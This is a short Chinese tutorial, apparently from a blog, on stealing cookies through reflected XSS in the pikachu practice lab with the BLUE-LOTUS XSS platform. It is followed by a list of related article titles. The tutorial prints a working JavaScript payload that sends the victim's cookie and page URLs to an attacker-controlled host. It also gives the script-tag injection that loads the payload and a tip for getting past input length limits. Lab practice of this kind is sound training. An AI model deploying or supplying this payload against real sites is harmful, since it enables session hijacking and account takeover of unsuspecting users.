XSS平台获取cookie

1.环境介绍

  • 靶场:pikachu
  • XSS平台:BLUE-LOTUS
  • 浏览器:谷歌浏览器

2.流程介绍

登录XSS平台,创建获取cookie的脚本

var website = "http://网站地址";
(function() {(new Image()).src = website + '/?keepsession=1&location=' + escape((function() {try {return document.location.href} catch (e) {return ''}})()) + '&toplocation=' + escape((function() {try {return top.location.href} catch (e) {return ''}})()) + '&cookie=' + escape((function() {try {return document.cookie} catch (e) {return ''}})()) + '&opener=' + escape((function() {try {return (window.opener && window.opener.location.href) ? window.opener.location.href : ''} catch (e) {return ''}})());
})();

登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)

由于输入框在前端进行了长度限制,可以选择检查进行修改

然后再输入框内输入payload

<script src="https:///网站地址/myjs/cookie.js"></script>

执行后就可以在XSS接收面板获取到用户的cookie信息了

3.遇到的问题

由于我自己搭建的平台使用的是https协议,而模板自动生成的是http所以导致不能接收到cookie信息

XSS平台获取cookie相关推荐

  1. 存储型XSS结合XSS平台获取cookie信息进后台——efucms

    百度搜索:efucms-含有存储型XSS漏洞的源码包 下载即可 实验目的:利用存储型XSS获取管理员Cookie信息,修改本地Cookie信息为管理员Cookie,以管理员身份不输入用户名.密码直接登 ...

  2. 渗透新手福利---xss到获取cookie入门级

    CV 新手写第一次写不足还请大佬多多指教,图片上传太麻烦了有的图片上传的位置估计不对,还请大家多多海量 通过对Tips的读取我们明白了这题是一道存储型XSS偷取cookie的题目.(因为flag在co ...

  3. xss平台打cookie登录后台(保姆级教程)

    前言 最新看了一篇hack学习呀[记一次帮助粉丝渗透黑入杀猪盘诈骗的实战]的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xs ...

  4. html获取cookie_知了汇智《XSS攻击-盗取cookie实战》课程文档讲解

    文章来源:知了汇智冯老师 今天是<web安全-XSS攻击>系列的最后一篇啦,希望大家好好学习哦~ XSS之 知了汇智-禁卫实验室(GoDun.F) 1. 编写获取cookie的代码cook ...

  5. Web安全原理剖析(十八)——XSS平台及漏洞修复建议

    目录 5.2 使用XSS平台测试XSS漏洞 5.3 XSS漏洞修复建议 5.2 使用XSS平台测试XSS漏洞   XSS平台可自行本地搭建或使用在线平台.   首先在XSS平台注册账号并登录,单击&q ...

  6. XSS跨站脚本攻击(DVWA XSS攻击详解、XSS平台搭建)

    一.跨站脚本攻击过程 二.XSS攻击定义及危害 三.XSS攻击常见分类 例:反射型 例:存储型 例:DOM型 四.XSS攻击常见编码 例: 编码后: 五.XSS常见测试语句 Script 标签 Scr ...

  7. XSS平台的简单搭建和获取cookie

    搭建蓝莲花XSS平台. 1.什么是XSS平台 XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的 ...

  8. 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录

    XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...

  9. DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示

    一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面.特点:弹窗警告.广告:javas ...

最新文章

  1. 以完美主义的名义,拖延症在公开掠夺
  2. 如何在C语言中巧妙地避免使用if语句?
  3. 无障碍开发(一)之初认识
  4. asp.net mvc web api 参数输入多个参数
  5. 操作系统基本特性——并发、共享、虚拟、异步
  6. android ListView ListSelector 不起作用(被覆盖)
  7. jasper 常用知识点总结
  8. SpringBoot文档翻译系列——26.日志logging
  9. ThreadLocal到底是什么,尚硅谷docker高级
  10. asp.net ashx处理程序中switch case的替代方案总结
  11. 快手用户群体分析_快手发布《2020快手用户及营销报告》
  12. Android热修复之阿里Sophix的使用详解
  13. 赛百味的中英文菜单对照
  14. M - Make Cents?
  15. DEBIAN_FRONTEND noninteractive参数
  16. inv如何用计算机计算,计算器INV是用那个键表示的
  17. 苹果硅之后:PC市场会走向何方?
  18. Charles的总结使用
  19. FLEAPHP框架的文件缓存系统
  20. html中的ol 和li,html中ol标签与li标签的高级应用

热门文章

  1. linux c语言创建多级目录
  2. java工程师学python爬虫_Python 爬取 11 万 Java 程序员信息竟有这些重大发现!
  3. jquery validation engine ajax,validationEngine ajax验证 java
  4. Python攻城师————MySQL数据库(自增、外键、关键字)
  5. 方舟服务器在线人数,Steam破2500万玩家,《方舟生存进化》仍居在线人数前十
  6. Python打包成exe终极方案,赶紧收藏吧
  7. MGR Switch single-Primary to Muti_primary
  8. uniapp —— 小程序实现带参分享微信、朋友圈以及调试获取参数
  9. Mac 小记 — 杂录
  10. 极致降噪,静听世界——万魔活塞豆降噪版体验评测